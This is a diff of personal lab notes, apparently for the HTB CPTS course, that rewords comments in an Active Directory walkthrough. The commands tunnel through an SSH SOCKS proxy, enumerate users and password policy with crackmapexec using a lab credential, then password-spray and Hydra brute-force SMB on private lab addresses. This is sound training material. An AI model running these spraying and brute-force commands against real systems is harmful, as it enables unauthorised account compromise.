amandaguglieri/hackinglife/docs/cpts-labs.md

 **Use a common method to obtain weak credentials for another user.
 Submit the username for the user whose credentials you obtain.**

 ```
-# Connect to the machine with assh reverse proxy
+# Establish an SSH connection with a SOCKS reverse proxy:
 ssh htb-student@$ip -D 1080

-# Now we perform enumeration by accessing to the host 172.16.7.50
+# Perform host enumeration by connecting to 172.16.7.50 using RDP:
 proxychains xfreerdp /v:172.16.7.50 /u:AB920 /cert:ignore

-# At the end we enumerate the password policy from our kali attacking machine
+# Enumerate the password policy from the Kali attacking machine:
 proxychains crackmapexec smb 172.16.7.3 -u AB920 -p weasal --pass-pol
 ```

 ![](img/ad.png)

 ```
-# Enumerate users
+# Enumerate user accounts on the target machine:
 proxychains crackmapexec smb 172.16.7.3 -u AB920 -p weasal --users > users.txt

-# Give some format to the file so we will only have the user list:
+# Extract and format the list of users to keep only usernames:
 sed -E 's/.*INLANEFREIGHT\.LOCAL\\([A-Z0-9]+).*/\1/' users.txt > final.txt

-# Launch a password spray from a kali terminal
+# Perform a password spray attack from the Kali terminal:
 proxychains crackmapexec smb 172.16.7.3 -u final.txt -p /usr/share/seclists/Passwords/xato-net-10-million-passwords-10000.txt --no-bruteforce

-# It will take a while.
+# Note: This process may take some time.

-# Finally we will have:
+# Conduct a brute-force attack using Hydra:
 proxychains hydra -L ~/borrar/final.txt -P /usr/share/seclists/Passwords/xato-net-10-million-passwords-10000.txt smb://172.16.7.3
 ```